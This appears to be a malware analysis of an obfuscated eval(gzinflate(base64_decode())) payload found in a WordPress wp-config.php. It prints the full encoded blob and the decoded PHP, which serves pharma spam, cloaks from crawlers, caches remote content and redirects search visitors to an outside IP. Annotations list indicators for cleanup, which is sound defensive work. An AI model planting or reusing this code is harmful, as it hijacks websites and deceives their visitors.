scurit

Malware - injected in wp-config.php file

Sep 25th, 2014
  1. <?php eval(gzinflate(base64_decode('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')));?>
  2.  
  3. -----------------------------
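  4. Decodes to (the payload above is unwrapped by base64_decode, then gzinflate, and the result is passed to eval; the literal wrapper "eval(gzinflate(base64_decode(" is a useful search string when auditing wp-config.php and other PHP files):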
  5. -------------------------------
  6.  
  7. <?php if (!defined('frmDs')) {
  8.     define('frmDs', 1); // run-once guard: the enclosing if skips the whole payload when frmDs is already defined
  9.     error_reporting(0); // switches off PHP error reporting from here on, so failures in the code below are not reported
  10.     function frm_dl($url) {
              // Analysis note: fetches $url over the network and returns the trimmed response
              // body. cURL is used when the extension is loaded; otherwise file_get_contents()
              // is called with warnings suppressed by @.
  11.         if (function_exists('curl_init')) {
  12.             $ch = curl_init($url);
  13.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  14.             $out = curl_exec($ch);
                  // Any cURL error replaces the response with false.
  15.             if (curl_errno($ch) !== 0) $out = false;
  16.             curl_close($ch);
  17.         } else {
  18.             $out = @file_get_contents($url);
  19.         }
              // trim() always yields a string, so a false from either branch reaches the caller as ''.
  20.         return trim($out);
  21.     }
  22.     function frm_crpt($in) {
              // Analysis note: XORs every byte of $in with '*' (0x2A) and returns the result.
              // The operation is its own inverse. frm_getcache() applies it when writing and
              // again when reading its cache files, so the files on disk do not contain the
              // downloaded text in plain form; XOR-ing a suspect file with 0x2A recovers it.
  23.         $il = strlen($in);
  24.         $o = '';
  25.         for ($i = 0;$i < $il;$i++) $o.= $in[$i] ^ '*';
  26.         return $o;
  27.     }
  28.     function frm_getcache($tmpdir, $link, $cmtime, $toe = false) {
              // Analysis note: returns the content behind $link, going through a file cache in
              // $tmpdir. $cmtime is the maximum cache age in minutes (it is compared as
              // 60 * $cmtime seconds). With $toe true, an empty download does not overwrite an
              // existing cache file.
              //
              // Cache file name: "sess_" followed by the md5 of $link with its leading
              // "http://host" part removed, i.e. sess_<32 hex characters>. The name looks like
              // a PHP session file; files of this shape in the directories probed by
              // frm_tmpdir() are an indicator to check for.
  29.         $f = $tmpdir . '/sess_' . md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
  30.         $fe = file_exists($f);
              // Refresh when there is no cache file yet or it is older than the allowed age.
  31.         if (!$fe || time() - filemtime($f) > 60 * $cmtime) {
  32.             $dlc = frm_dl($link);
                  // touch() only bumps the modification time, keeping the old content in use.
  33.             if ($fe && $dlc === false) @touch($f);
  34.             else {
  35.                 if ($fe && empty($dlc) && $toe) {
  36.                     @touch($f);
  37.                 } else {
  38.                     if ($fp = @fopen($f, 'w')) {
                              // Stored XOR-encoded, see frm_crpt().
  39.                         fwrite($fp, frm_crpt($dlc));
  40.                         fclose($fp);
  41.                     } else {
                              // Cache file not writable: hand back the fresh download directly.
  42.                         return $dlc;
  43.                     }
  44.                 }
  45.             }
  46.         }
              // Read the cache file back and decode it; '' when it is missing or empty.
  47.         $fc = @file_get_contents($f);
  48.         return ($fc) ? frm_crpt($fc) : '';
  49.     }
  50.     function frm_isbot() {
              // Analysis note: returns true when the current request is classified as coming
              // from a crawler, false otherwise. The rest of the payload uses the result to
              // decide which visitors get injected content and which get redirected, so a
              // manual check of an infected site with an ordinary browser can look clean.
  51.         $ua = @strtolower($_SERVER['HTTP_USER_AGENT']);
              // ip2long() can return a negative number on 32-bit builds; adding 2^32 makes it unsigned.
  52.         if (($lip = ip2long($_SERVER['REMOTE_ADDR'])) < 0) $lip+= 4294967296;
              // Eleven inclusive [first, last] IPv4 ranges written as unsigned integers. The
              // source does not say who owns them; presumably search-engine crawler networks
              // (to be confirmed against WHOIS data before relying on it).
  53.         $rs = array(array(3639549953, 3639558142), array(1089052673, 1089060862), array(1123635201, 1123639294), array(1208926209, 1208942590), array(3512041473, 3512074238), array(1113980929, 1113985022), array(1249705985, 1249771518), array(1074921473, 1074925566), array(3481178113, 3481182206), array(2915172353, 2915237886), array(2850291712, 2850357247));
  54.         foreach ($rs as $r) if ($lip >= $r[0] && $lip <= $r[1]) return true;
              // A request without a User-Agent header is also treated as a crawler.
  55.         if (!$ua) return true;
              // Substring match on the lower-cased User-Agent.
  56.         $bots = array('googlebot', 'bingbot', 'slurp', 'msnbot', 'jeeves', 'teoma', 'crawler', 'spider');
  57.         foreach ($bots as $b) if (strpos($ua, $b) !== false) return true;
              // Reverse DNS lookup of the client address, matched on substrings of the host name.
  58.         $h = @gethostbyaddr($_SERVER['REMOTE_ADDR']);
  59.         $hba = array('google', 'msn', 'yahoo');
  60.         if ($h) foreach ($hba as $hb) if (strpos($h, $hb) !== false) return true;
  61.         return false;
  62.     }
  63.     function frm_tmpdir() {
              // Analysis note: returns the first directory in which a file can be created, or
              // false when none is writable. The returned directory is where frm_getcache()
              // keeps its sess_* cache files, so this list is also the list of places to
              // inspect during cleanup.
  64.         $fs = array('/tmp', '/var/tmp', './wp-content/cache', './wp-content/uploads', './tmp', './cache', './images');
              // Directories named by the TMP, TEMP and TMPDIR environment variables are appended.
  65.         foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
  66.             if ($t = getenv($v)) {
  67.                 $fs[] = $t;
  68.             }
  69.         }
  70.         if (function_exists('sys_get_temp_dir')) {
  71.             $fs[] = sys_get_temp_dir();
  72.         }
              // Last resort: the current working directory.
  73.         $fs[] = '.';
  74.         foreach ($fs as $f) {
                  // Writability probe: create a file with a random md5 name and delete it again.
  75.             $tf = $f . '/' . md5(rand());
  76.             if ($fp = @fopen($tf, 'w')) {
  77.                 fclose($fp);
  78.                 unlink($tf);
  79.                 return $f;
  80.             }
  81.         }
  82.         return false;
  83.     }
  84.     function frm_seref() {
              // Analysis note: returns true when the lower-cased Referer header contains one of
              // the listed search-engine names followed by a dot ("google.", "bing.", ...).
              // frm_red() redirects only requests for which this is true, so reproducing the
              // redirect requires a search-engine Referer.
  85.         $r = @strtolower($_SERVER["HTTP_REFERER"]);
  86.         $ses = array('google', 'bing', 'yahoo', 'ask', 'aol');
              // The comparison is the loose != false, so a match at offset 0 does not count.
  87.         foreach ($ses as $se) if (strpos($r, $se . '.') != false) return true;
  88.         return false;
  89.     }
  90.     function frm_havekey($s = false) {
              // Analysis note: returns the first keyword from the list below that occurs in the
              // text being checked, or '' when none does. The list consists of drug and
              // pharmacy product names, which identifies this sample as pharma search spam.
  91.         $nks = explode('|', 'abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
              // Without an argument the text is the lower-cased Referer plus request URI.
  92.         $k = ($s == false) ? @strtolower($_SERVER["HTTP_REFERER"] . $_SERVER["REQUEST_URI"]) : $s;
              // Requests whose text contains a URL-encoded "site:" or "inurl:" are ignored.
  93.         if (strpos($k, "site%3A") !== false || strpos($k, "inurl%3A") !== false) return '';
              // Both groups in the pattern may match the empty string, so this behaves as a plain substring test.
  94.         foreach ($nks as $n) if (preg_match("/(|_)$n(|_)/", $k)) return $n;
  95.         return '';
  96.     }
  97.     function frm_strtonum($Str, $Check, $Magic) {
              // Analysis note: folds the bytes of $Str into a number. For each byte the running
              // value $Check is multiplied by $Magic, reduced modulo 2^32 once it reaches that
              // size, and the byte's ordinal is added. Called only from frm_chhash().
  98.         $Int32Unit = 4294967296;
  99.         $length = strlen($Str);
  100.         for ($i = 0;$i < $length;$i++) {
  101.             $Check*= $Magic;
  102.             if ($Check >= $Int32Unit) {
  103.                 $Check = ($Check - $Int32Unit * (int)($Check / $Int32Unit));
  104.                 $Check = ($Check < - 2147483648) ? ($Check + $Int32Unit) : $Check;
  105.             }
                   // $Str{$i} is the curly-brace string offset syntax, which PHP 8.0 removed;
                   // the decoded payload therefore only parses on older PHP versions.
  106.             $Check+= ord($Str{$i});
  107.         }
  108.         return $Check;
  109.     }
  110.     function frm_chhash($String) {
               // Analysis note: derives a checksum string from $String. frm_chpr() sends the
               // result as the ch= parameter of its toolbarqueries.google.com request. The
               // function only computes a value; it has no side effects.
               // Two hashes of the same input with different seed and multiplier.
  111.         $Check1 = frm_strtonum($String, 0x1505, 0x21);
  112.         $Check2 = frm_strtonum($String, 0, 0x1003F);
               // Bit shuffling that mixes both hashes into one number.
  113.         $Check1 >>= 2;
  114.         $Check1 = (($Check1 >> 4) & 0x3FFFFC0) | ($Check1 & 0x3F);
  115.         $Check1 = (($Check1 >> 4) & 0x3FFC00) | ($Check1 & 0x3FF);
  116.         $Check1 = (($Check1 >> 4) & 0x3C000) | ($Check1 & 0x3FFF);
  117.         $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) << 2) | ($Check2 & 0xF0F);
  118.         $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000);
  119.         $Hashnum = ($T1 | $T2);
  120.         $CheckByte = 0;
  121.         $Flag = 0;
               // Unsigned decimal form of the mixed hash.
  122.         $HashStr = sprintf('%u', $Hashnum);
  123.         $length = strlen($HashStr);
               // Check digit: walk the decimal digits from the right, double every second one
               // and add its digit sum (a Luhn-like scheme).
  124.         for ($i = $length - 1;$i >= 0;$i--) {
  125.             $Re = $HashStr{$i};
  126.             if (1 === ($Flag % 2)) {
  127.                 $Re+= $Re;
  128.                 $Re = (int)($Re / 10) + ($Re % 10);
  129.             }
  130.             $CheckByte+= $Re;
  131.             $Flag++;
  132.         }
  133.         $CheckByte%= 10;
  134.         if (0 !== $CheckByte) {
  135.             $CheckByte = 10 - $CheckByte;
  136.             if (1 === ($Flag % 2)) {
  137.                 if (1 === ($CheckByte % 2)) {
  138.                     $CheckByte+= 9;
  139.                 }
  140.                 $CheckByte >>= 1;
  141.             }
  142.         }
               // Result layout: literal '7', the check digit, then the decimal hash.
  143.         return '7' . $CheckByte . $HashStr;
  144.     }
  145.     function frm_chpr($url, $td) {
               // Analysis note: asks toolbarqueries.google.com for the rank of $url
               // (features=Rank), with the checksum from frm_chhash() in ch=. The answer is
               // cached through frm_getcache() in directory $td for 60 * 24 * 7 minutes (one
               // week). This is an outbound request made by the web server itself.
  146.         $ch = frm_chhash($url);
  147.         $res = frm_getcache($td, "http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url", 60 * 24 * 7);
               // Returns the single character at offset 9 of a response containing "Rank_";
               // nothing is returned (null) when the marker is absent.
  148.         if (($pos = strpos($res, "Rank_")) !== false) return substr($res, 9, 1);
  149.     }
  150.     function frm_red($k) {
               // Analysis note: ends the request with a JavaScript redirect, but only for
               // visitors that frm_isbot() does not classify as crawlers and that arrive with
               // a search-engine Referer (frm_seref()). All other requests return from here
               // untouched.
  151.         if (!frm_isbot() && frm_seref()) {
                   // The redirect URL reports the matched keyword (k), the Referer (s) and
                   // this site's host plus request URI (r) to the remote server.
  152.             $r = @urlencode($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
  153.             $s = @urlencode($_SERVER['HTTP_REFERER']);
                   // Indicator: 178.73.212.30 with path /stat/go.php. die() prints the page and
                   // stops PHP, so the real site content is never rendered for this visitor.
  154.             die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
  155.         }
  156.     }
  157.     $tdir = frm_tmpdir(); // writable directory for the sess_* cache files, or false
  158.     $isb = frm_isbot(); // true when the request is classified as a crawler
  159.     $k = frm_havekey(); // keyword found in Referer + request URI, or ''
           // Host header, lower-cased, with a leading "www." removed.
  160.     $host = preg_replace('/^w{3}\./', '', strtolower($_SERVER['HTTP_HOST']));
           // A POST field whose name is md5($host . 'ch') makes the script print that field's
           // value and exit. NOTE(review): presumably a way for the operator to test that the
           // injection is live; the value is echoed back as received.
  161.     if ($cv = @$_POST[md5($host . 'ch') ]) {
  162.         exit($cv);
  163.     }
           // The content-serving part runs only with a writable cache directory, a host name
           // shorter than 100 characters and a host that is not a dotted IPv4 literal.
  164.     if ($tdir && strlen($host) < 100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)) {
               // Per-site query parameter name: up to three lower-case letters taken from
               // base64(md5($host . 'p1')).
  165.         $parg = substr(preg_replace('/[^a-z]+/', '', strtolower(base64_encode(md5($host . 'p1')))), 0, 3);
               // Indicator: base URL of the remote content feed (eylrgwfxkhb.rr.nu, path
               // /stat/feed.php). Every die() below prints text downloaded from it in place
               // of the site's own page.
  166.         $sp = "http://eylrgwfxkhb.rr.nu/stat/feed.php?pa=$parg&h=$host";
  167.         //
  168.         $tp = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
               // Crawler request and a rank above 1 from frm_chpr(): serve feed content
               // requested with a=l, the page address and the rank; cached for one day.
  169.         if ($isb && ($ppr = frm_chpr($tp)) > 1) {
  170.             $pc = frm_getcache($tdir, $sp . "&a=l&p=" . urlencode($tp) . "&pr=$ppr", 60 * 24);
  171.             if ($pc) die($pc);
  172.         }
  173.         //
  174.         $ruri = strtolower($_SERVER['REQUEST_URI']);
               // Numeric value of the per-site query parameter, 0 when it is absent.
  175.         $pageid = (isset($_GET[$parg])) ? $_GET[$parg] * 1 : 0;
               // URLs of the form /?<parg>=<n> or /index.php?<parg>=<n>: redirect visitors
               // coming from a search engine, otherwise print the feed page with that id.
  176.         if ((strpos($ruri, '/?') === 0 || strpos($ruri, '/index.php?') === 0) && $pageid > 0) {
  177.             frm_red($k);
  178.             die(frm_getcache($tdir, $sp . "&p=$pageid", 60 * 24, true));
  179.         }
               // Home page requested by a crawler: print the feed's default content.
  180.         if (($ruri == '/' || $ruri == '/index.php') && $isb) {
  181.             $c = frm_getcache($tdir, $sp, 60 * 24);
  182.             if ($c) die($c);
  183.         }
  184.         //
               // Keyword present: fetch a '|'-separated list of request URIs (a=s), cached
               // for 30 minutes for crawlers and one week otherwise. When the current URI is
               // on that list, redirect search visitors or print the feed page for it.
  185.         if ($k && $sdl = frm_getcache($tdir, $sp . "&a=s", ($isb ? 30 : 60 * 24 * 7), true)) {
  186.             if (strpos($sdl, '|' . $ruri . '|') !== false) {
  187.                 frm_red($k);
  188.                 die(frm_getcache($tdir, $sp . "&a=s&p=" . urlencode($ruri), 60 * 24 * 7, true));
  189.             }
  190.         }
  191.     }
           // Fallback: any request carrying a keyword may still be redirected by frm_red().
  192.     if ($k) frm_red($k);
  193. }